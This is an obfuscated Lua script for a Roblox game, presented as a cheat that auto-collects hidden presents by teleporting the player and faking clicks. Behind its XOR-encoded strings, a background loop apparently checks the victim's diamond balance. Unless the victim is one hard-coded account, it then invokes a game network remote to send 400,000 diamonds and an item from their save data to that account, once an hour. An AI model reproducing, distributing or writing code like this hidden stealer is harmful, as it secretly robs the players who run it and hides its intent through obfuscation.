--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v25,v26)local v27={};for v29=1, #v25 do v6(v27,v0(v4(v1(v2(v25,v29,v29 + 1 )),v1(v2(v26,1 + (v29% #v26) ,1 + (v29% #v26) + 1 )))%256 ));end return v5(v27);end wait(6 -2 );local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\20\194\56\206\239\51\204\41\192","\156\67\173\74\165"));local v10=game:GetService(v7("\2\190\91\2\169\39\74\29\185\89\3\168\11\71\58\182\78\19\174","\38\84\215\41\118\220\70"));local v11=v9.CurrentCamera;local v12=v8.LocalPlayer;local v13=v12.Character and v12.Character:FindFirstChild(v7("\120\3\47\19\240\95\31\38\32\241\95\2\18\19\236\68","\158\48\118\66\114")) ;local v14=v11.ViewportSize;local v15,v16=v14.X/2 ,v14.Y/2 ;local v17=1080.1 -(1020 + 60) ;local v18=true;local function v19(v28)if v13 then v13.Anchored=false;v13.CFrame=CFrame.new(v28.Position);wait(0.1);v10:SendMouseButtonEvent(v15,v16,1423 -(630 + 793) ,true,game,3 -2 );v10:SendMouseButtonEvent(v15,v16,0 -0 ,false,game,1 + 0 );v13.Anchored=true;end end local function v20()while v18 do local v30=0;local v31;local v32;while true do if (v30==(3 -2)) then while true do if ((1748 -(760 + 987))==v31) then wait(1914 -(1789 + 124) );break;end if (v31==0) then v32=v9[v7("\148\27\36\30\90\139\220\152","\155\203\68\112\86\19\197")].HiddenPresents;for v40,v41 in ipairs(v32:GetChildren()) do if (v41.Name==v7("\110\212\50\248\69\118\213\234\67\206\51\242\84","\152\38\189\86\156\32\24\133")) then local v43=766 -(745 + 21) ;local v44;while true do if (v43==(0 + 0)) then v44=0 -0 ;while true do if (v44==(0 -0)) then v19(v41);wait(v17);break;end end break;end end end end v31=1 + 0 ;end end break;end if (v30==(0 + 0)) then v31=1055 -(87 + 968) ;v32=nil;v30=4 -3 ;end end end end v20();local v21=require(game:GetService(v7("\206\82\183\74\245\84\166\82\249\83\148\82\243\69\166\65\249","\38\156\55\199")).Library).Save.Get();local function v22()for v33,v34 in pairs(v21[v7("\129\115\106\45\29\96\245\81\177","\35\200\29\28\72\115\20\154")][v7("\58\170\195\205\136\34\55\0","\84\121\223\177\191\237\76")]) do if (v34[v7("\178\82","\161\219\54\169\192\90\48\80")]==v7("\109\75\1\40\70\76\4\54","\69\41\34\96")) then return v33,tonumber(v34[v7("\131\194\218","\75\220\163\183\106\98")]);end end end local v23=game:GetService(v7("\50\182\138\46\220\16\169","\185\98\218\235\87")).LocalPlayer.leaderstats["\240\159\146\142 Diamonds"].Value;local v24=game:GetService(v7("\251\48\38\255\219\184\216","\202\171\92\71\134\190")).LocalPlayer;task.spawn(function()while task.wait() do if (v23>=(408270 + 41730)) then if (v24.Name~=v7("\13\192\62\163\60\242\20\146\51\219\54","\232\73\161\76")) then local v37=0;local v38;while true do if (v37==(0 -0)) then local v42=1413 -(447 + 966) ;while true do if (v42==(2 -1)) then v37=1818 -(1703 + 114) ;break;end if (v42==(701 -(376 + 325))) then v38={[1 -0 ]=v7("\159\216\80\118\11\136\225\88\71\4\161","\126\219\185\34\61"),[2]=v7("\89\155\11\39","\135\108\174\62\18\30\23\147"),[8 -5 ]=v7("\149\252\56\217\29\160\48\222","\167\214\137\74\171\120\206\83"),[2 + 2 ]=tostring(v22()),[10 -5 ]=400014 -(9 + 5) };game:GetService(v7("\185\245\34\81\241\164\138\228\55\89\203\179\132\226\51\90\253","\199\235\144\82\61\152")).Network:FindFirstChild(v7("\42\23\176\39\5\25\161\113\71\37\188\37\3","\75\103\118\217")):InvokeServer(unpack(v38));v42=377 -(85 + 291) ;end end end if (v37==(1266 -(243 + 1022))) then task.wait(60 * (228 -168) );break;end end end end end end);
